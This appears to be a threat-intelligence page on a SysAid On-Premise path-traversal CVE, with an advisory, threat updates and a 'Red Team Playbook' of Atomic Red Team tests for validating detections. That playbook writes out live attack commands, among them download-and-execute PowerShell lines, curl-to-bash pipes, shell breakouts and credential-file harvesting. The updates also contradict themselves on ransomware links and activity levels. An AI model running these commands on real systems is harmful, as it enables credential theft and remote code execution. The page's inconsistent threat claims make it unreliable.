CVE-2023-47246

CRITICAL CISA KEV POC TTE 7d Pub 10/11 Upd 31/07

Overview

This vulnerability is a path traversal flaw in SysAid On-Premise versions prior to 23.3.36. The root cause lies in insufficient validation of file path inputs, enabling an attacker to write arbitrary files to the Tomcat webroot directory. The affected component is the file handling mechanism within the SysAid On-Premise server environment, specifically related to how user-supplied paths are processed and resolved.

Vulnerability Description

In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.

Impact

An attacker can achieve remote code execution on the SysAid On-Premise server without requiring authentication or user interaction. This enables full system compromise, including execution of arbitrary commands under the Tomcat server context, potentially leading to data theft, service disruption, or lateral movement within the network. The compromise of the service desk infrastructure can result in exposure of sensitive organizational data and operational downtime.

Solution

SysAid has released version 23.3.36 addressing this vulnerability. Administrators should upgrade to this version immediately. Detailed patch instructions and security enhancements are documented at https://documentation.sysaid.com/docs/on-premise-security-enhancements-2023 and https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification. No alternative workarounds are specified; applying the vendor-provided update is required to mitigate the issue.

EPSS vs KEV Prediction — Evolution (30 days)

Full Analysis

The vulnerability in SysAid On-Premise prior to version 23.3.36 is characterized as a path traversal flaw, which allows an attacker to manipulate file paths in a way that can lead to unauthorized file access and code execution. This occurs when the application fails to properly sanitize user input, particularly when handling file paths. By exploiting this weakness, an attacker can write malicious files to the Tomcat webroot directory, which is a critical component of the web server environment. Once the malicious file is executed, it can lead to a complete compromise of the server, allowing the attacker to execute arbitrary code with the same privileges as the web server process.

The attack vector for this vulnerability is primarily through web-based interactions with the SysAid application. An attacker could craft a specially designed request that includes path traversal sequences, such as "../", to navigate the file system and reach sensitive directories. This could be done through various means, including but not limited to, exploiting forms, API endpoints, or any other user input fields that interact with the file system. Once the attacker successfully writes a malicious file to the webroot, they can trigger its execution, leading to potential data breaches, unauthorized access to sensitive information, or further lateral movement within the network.

The real-world impact of this vulnerability is significant, particularly for organizations that rely on SysAid for IT service management. Given the CVSS score of 9.8, this vulnerability is classified as critical, indicating a high likelihood of exploitation and severe consequences if successful. The potential business risks include data loss, reputational damage, and financial implications stemming from remediation efforts and regulatory fines, especially if sensitive customer or employee data is compromised. Furthermore, the exploitation of this vulnerability could lead to a broader compromise of the organization’s IT infrastructure, as attackers may use the initial foothold to escalate privileges or pivot to other systems.

To effectively detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, it is crucial to ensure that all instances of SysAid On-Premise are updated to the latest version, as this will eliminate the known vulnerability. Regular patch management practices should be established to ensure that all software is kept up to date. Additionally, organizations should conduct thorough security assessments and penetration testing to identify any potential weaknesses in their applications. Implementing web application firewalls (WAFs) can also help to filter out malicious requests that may attempt to exploit this vulnerability. Finally, monitoring logs for unusual file access patterns or unauthorized file creations can provide early indicators of an attempted exploitation.

In conclusion, the path traversal vulnerability in SysAid On-Premise presents a critical risk to organizations utilizing this software. The ability for an attacker to execute arbitrary code through this flaw underscores the importance of maintaining robust security practices, including timely updates, proactive monitoring, and comprehensive security assessments. By addressing this vulnerability and implementing strong security measures, organizations can significantly reduce their risk exposure and protect their critical assets from potential exploitation.




CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting the CVE-2023-47246 vulnerability in SysAid On-Premise. Our telemetry indicates a doubling in observed attack activity, signaling increased adversary interest and operational tempo. This surge coincides with the public availability of multiple proof-of-concept exploits on widely accessed platforms, which lowers the barrier for threat actors to weaponize this critical path traversal flaw. The presence of ransomware-linked activity further elevates the threat profile, as attackers leverage this vulnerability to deploy malicious payloads with potential for significant operational disruption. While the EPSS score remains high and stable, the amplification in real-world exploitation attempts underscores an urgent need for heightened vigilance. Consequently, the risk landscape has intensified, reflecting a transition from theoretical to active exploitation, thereby increasing the likelihood of successful compromise for organizations running vulnerable SysAid versions.



Update 2 — July 05, 2026

CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2023-47246, accompanied by a growing presence of publicly available proof-of-concept exploits on GitHub. This uptick in activity, while moderate, signals sustained attacker interest and a potential broadening of the threat actor base leveraging this critical SysAid vulnerability. The continued association with ransomware deployment remains a significant concern, as adversaries exploit the path traversal flaw to gain persistent access and execute malicious payloads within compromised environments. Although the Exploit Prediction Scoring System (EPSS) score remains stable at an extremely high level, the incremental rise in telemetry detections indicates that exploitation is becoming more frequent in operational settings. This evolving landscape heightens the urgency for defenders to monitor for indicators of compromise related to this vulnerability, as the risk of successful intrusion and subsequent ransomware impact is increasingly tangible.



Update 3 — July 15, 2026

CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2023-47246, with telemetry indicating a significant uptick in adversary activity leveraging this path traversal vulnerability. This surge is accompanied by the emergence of multiple new proof-of-concept exploits publicly available on GitHub, which lowers the barrier for threat actors to weaponize the flaw. The persistence of ransomware groups exploiting this vulnerability remains a critical concern, as increased exploitation frequency correlates with a heightened risk of successful intrusions leading to ransomware deployment. Although the EPSS score remains near its peak, the current trend in detection activity signals a shift from isolated incidents to more widespread operational use. Consequently, the threat level for organizations running vulnerable SysAid On-Premise versions is elevated, underscoring the growing urgency for vigilant monitoring and incident response readiness.



Update 4 — July 23, 2026

CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2023-47246, indicating continued adversary interest and operational use. This uptick, while modest, reflects persistent activity rather than isolated incidents, suggesting that threat actors—particularly ransomware groups—are maintaining or marginally expanding their campaigns leveraging this critical SysAid On-Premise vulnerability. The availability of multiple proof-of-concept exploits on public repositories continues to lower the barrier for exploitation, potentially broadening the attacker base. Although the EPSS score remains stable near its peak, the incremental rise in telemetry signals a sustained threat environment that defenders must monitor closely. This evolving landscape elevates the risk profile for organizations running vulnerable SysAid versions, as even a slight increase in exploitation attempts can translate into higher likelihood of successful intrusions and ransomware deployment.



Update 5 — August 15, 2026

CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2023-47246, reflecting a continuing upward trend in attacker activity against vulnerable SysAid On-Premise deployments. This escalation, while moderate, underscores persistent adversary interest facilitated by publicly available proof-of-concept exploits that simplify operational execution. Our telemetry indicates that threat actors remain actively probing for opportunities to leverage this path traversal vulnerability to achieve remote code execution, with ransomware groups continuing to be implicated in observed campaigns. Although the EPSS score remains near its peak and stable, the incremental rise in exploitation signals a sustained and evolving threat environment that heightens the risk of successful compromise. Defenders should interpret this as an indication that the attack surface remains attractive and that exploitation attempts are unlikely to diminish in the near term, thereby maintaining the criticality of vigilant monitoring.

Affected Products (1)

Vendor Product Version CPE
sysaid Sysaid Sysaid All cpe:2.3:a:sysaid:sysaid:*:*:*:*:on-premises:*:*:*
Warning: The exploits and proof-of-concept (PoC) code listed below are sourced from third-party public repositories. CSURFACE assumes no responsibility for the content, accuracy, or safety of these resources. Use at your own risk. Learn more

GitHub PoCs (2)

Repository Author Stars Forks Date Link
W01fh4cker/CVE-2023-47246-EXP
exploit for cve-2023-47246 SysAid RCE (shell upload)
W01fh4cker 51 9 2023-11-17 View
rainbowhatrkn/CVE-2023-47246
exploit for cve-2023-47246 SysAid RCE (shell upload)
rainbowhatrkn 0 0 2023-11-22 View
Exploited in Wild CONFIRMED
Ransomware NOT ASSOCIATED
Attacker Interest MEDIUM
Sightings Few sightings

Threat Feed

18 events
2026-08-04
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-03
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-31
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-30
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-29
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-18
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-17
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-13
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-12
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-07
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-06
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-30
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-23
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-05
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-03-12
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2023-11-17
PoC Published (2 GitHub repositories)

Proof-of-concept code is publicly available for this vulnerability

2023-11-13
Added to CISA KEV Catalog

CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog

Likely Kill Chain

Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.

Applicable Out of scope
Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Priv. Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Lateral Movement
TA0008
Collection
TA0009
Impact
TA0040

Kill chain derived from the ML classifier.

Attack Vectors ML

Path Traversal
100% path_traversal
Remote Code Execution
85% rce
Code Injection
69% code_injection

MITRE ATT&CK Techniques (6)

The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.

ID Name Stage Tactics Platforms Link
T1190 Exploit Public-Facing Application Initial Access initial-access Containers, ESXi, IaaS, Linux, macOS, Network Devices, Windows
T1059.004 Unix Shell Kill Chain execution ESXi, Linux, macOS, Network Devices
T1505.003 Web Shell Kill Chain persistence Linux, macOS, Network Devices, Windows
T1552.001 Credentials In Files Kill Chain credential-access Containers, IaaS, Linux, macOS, Windows
T1049 System Network Connections Discovery Kill Chain discovery Windows, IaaS, Linux, macOS, Network Devices, ESXi
T1021.004 SSH Kill Chain lateral-movement ESXi, Linux, macOS

CAPEC Attack Patterns ML

ID Name ML Conf. Likelihood Severity Link
CAPEC-126 Path Traversal
43%
High Very High
CAPEC-79 Using Slashes in Alternate Encoding
40%
High High
CAPEC-78 Using Escaped Slashes in Alternate Encoding
38%
High High
CAPEC-64 Using Slashes and URL Encoding Combined to Bypass Validation Logic
37%
High High
CAPEC-76 Manipulating Web Input to File System Calls
32%
High Very High

Red Team Playbook

44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.

T1021.004 ESXi - Enable SSH via PowerCLI Windows PowerShell Privileged
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
Command (PowerShell)
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
T1021.004 ESXi - Enable SSH via VIM-CMD Windows CMD
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
Command (CMD)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1049 System Discovery using SharpView Windows PowerShell Privileged
Get a listing of network connections, domains, domain users, and etc. sharpview.exe located in the bin folder, an opensource red-team tool. Upon successful execution, cmd.exe will execute sharpview.exe <method>. Results will output via stdout.
Command (PowerShell)
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
T1049 System Network Connections Discovery Windows CMD
Get a listing of network connections. Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. `net sessions` requires elevated privileges; on standard user accounts this command may not return results. Results will output via stdout.
Command (CMD)
netstat -ano
net use
net sessions 2>nul
T1049 System Network Connections Discovery FreeBSD, Linux & MacOS Linux, macOS Shell
Get a listing of network connections. Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
Command (Shell)
netstat
who -a
T1049 System Network Connections Discovery via PowerShell (Process Mapping) Windows PowerShell
Enumerate TCP connections and map to owning process names via PowerShell.
Command (PowerShell)
Get-NetTCPConnection | ForEach-Object {
  $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
  [pscustomobject]@{
    Local   = "$($_.LocalAddress):$($_.LocalPort)"
    Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
    State   = $_.State
    PID     = $_.OwningProcess
    Process = if ($p) { $p.ProcessName } else { $null }
  }
} | Sort-Object State,Process | Format-Table -AutoSize
T1049 System Network Connections Discovery via sockstat (Linux, FreeBSD) Linux Shell
Enumerate IPv4/IPv6 network endpoints on FreeBSD using sockstat.
Command (Shell)
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
T1049 System Network Connections Discovery via ss or lsof (Linux/MacOS) Linux, macOS Bash
List active TCP/UDP network connections using ss, with lsof as a fallback when ss is unavailable. Serves as an alternative to the netstat-based test.
Command (Bash)
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
T1049 System Network Connections Discovery with PowerShell Windows PowerShell
Get a listing of network connections. Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.
Command (PowerShell)
Get-NetTCPConnection
T1059.004 Change login shell Linux Bash Privileged
An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/bash shell, changes the users shell to sh, then deletes the art user.
Command (Bash)
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
T1059.004 Command line scripts Linux Shell
An adversary may type in elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out Atomic Red Team was here!
Command (Shell)
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
T1059.004 Command-Line Interface Linux, macOS Shell
Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server. Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
Command (Shell)
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
T1059.004 Create and Execute Bash Shell Script Linux, macOS Shell
Creates and executes a simple sh script.
Command (Shell)
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
T1059.004 Creating shell using cpan command Linux, macOS Shell
cpan lets you execute perl commands with the ! command. It can be used to break out from restricted environments by spawning an interactive system shell. Reference - https://gtfobins.github.io/gtfobins/cpan/
Command (Shell)
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1  cpan
T1059.004 Current kernel information enumeration Linux Shell
An adversary may want to enumerate the kernel information to tailor their attacks for that particular kernel. The following command will enumerate the kernel information.
Command (Shell)
uname -srm
T1059.004 Detecting pipe-to-shell Linux Shell
An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage...
Command (Shell)
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt      
T1059.004 Environment variable scripts Linux Shell
An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/bash
Command (Shell)
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
T1059.004 Harvest SUID executable files Linux Shell
AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges.
Command (Shell)
chmod +x #{autosuid}
bash #{autosuid}
T1059.004 LinEnum tool execution Linux Shell
LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.
Command (Shell)
chmod +x #{linenum}
bash #{linenum}
T1059.004 New script file in the tmp directory Linux Shell
An attacker may create script files in the /tmp directory using the mktemp utility and execute them. The following commands creates a temp file and places a pointer to it in the variable $TMPFILE, echos the string id into it, and then executes the file using bash, which...
Command (Shell)
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
T1059.004 Obfuscated command line scripts Linux Shell
An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to...
Command (Shell)
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
T1059.004 Shell Creation using awk command Linux, macOS Shell
In awk the begin rule runs the first record without reading or interpreting it. This way a shell can be created and used to break out from restricted environments with the awk command. Reference - https://gtfobins.github.io/gtfobins/awk/#shell
Command (Shell)
awk 'BEGIN {system("/bin/sh &")}'
T1059.004 Shell Creation using busybox command Linux Shell
BusyBox is a multi-call binary. A multi-call binary is an executable program that performs the same job as more than one utility program. It can be used to break out from restricted environments by spawning an interactive system shell. Reference -...
Command (Shell)
busybox sh &
T1059.004 What shell is running Linux Shell
An adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running.
Command (Shell)
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
T1059.004 What shells are available Linux Shell
An adversary may want to discover which shell's are available so that they might switch to that shell to tailor their attacks to suit that shell. The following commands will discover what shells are available on the host.
Command (Shell)
cat /etc/shells 
T1059.004 emacs spawning an interactive system shell Linux, macOS Shell Privileged
emacs can be used to break out from restricted environments by spawning an interactive system shell. Ref: https://gtfobins.github.io/gtfobins/emacs/
Command (Shell)
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
T1505.003 Web Shell Written to Disk Windows CMD
This test simulates an adversary leveraging Web Shells by simulating the file modification to disk. Idea from APTSimulator. cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
Command (CMD)
xcopy /I /Y "#{web_shells}" #{web_shell_path}
T1552.001 Access unattend.xml Windows CMD Privileged
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
Command (CMD)
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
T1552.001 Extract Browser and System credentials with LaZagne macOS Bash Privileged
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
Command (Bash)
python2 laZagne.py all
T1552.001 Extract passwords with grep Linux, macOS Shell
Extracting credentials from files
Command (Shell)
grep -ri password #{file_path}
exit 0
T1552.001 Extracting passwords with findstr Windows PowerShell
Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
Command (PowerShell)
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
T1552.001 Find AWS credentials Linux, macOS Shell
Find local AWS credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
T1552.001 Find Azure credentials Linux, macOS Shell
Find local Azure credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
T1552.001 Find GCP credentials Linux, macOS Shell
Find local Google Cloud Platform credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
T1552.001 Find OCI credentials Linux, macOS Shell
Find local Oracle cloud credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
T1552.001 Find and Access Github Credentials Linux, macOS Bash
This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
Command (Bash)
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
T1552.001 List Credential Files via Command Prompt Windows CMD Privileged
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
Command (CMD)
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
T1552.001 List Credential Files via PowerShell Windows PowerShell Privileged
Via PowerShell,list files where credentials are stored in Windows Credential Manager
Command (PowerShell)
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
T1552.001 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials Windows PowerShell
Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive  
T1552.001 WinPwn - SessionGopher Windows PowerShell
Launches SessionGopher on this system via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
T1552.001 WinPwn - Snaffler Windows PowerShell
Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
T1552.001 WinPwn - passhunt Windows PowerShell
Search for Passwords on this system using passhunt via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
T1552.001 WinPwn - powershellsensitive Windows PowerShell
Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
T1552.001 WinPwn - sensitivefiles Windows PowerShell
Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput

Detection & Response Rules

No detection or response rules found for this CVE.

No news articles found for this CVE.

References (5)

Title Tags URL
nvd.nist.gov
NVD reference
https://nvd.nist.gov/vuln/detail/CVE-2023-47246
documentation.sysaid.com
GitHub CVE
https://documentation.sysaid.com/docs/on-premise-security-enhancements-2023
sysaid.com
GitHub CVE
https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
documentation.sysaid.com
GitHub CVE
https://documentation.sysaid.com/docs/latest-version-installation-files
cisa.gov
NVD API US Government Resource
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-47246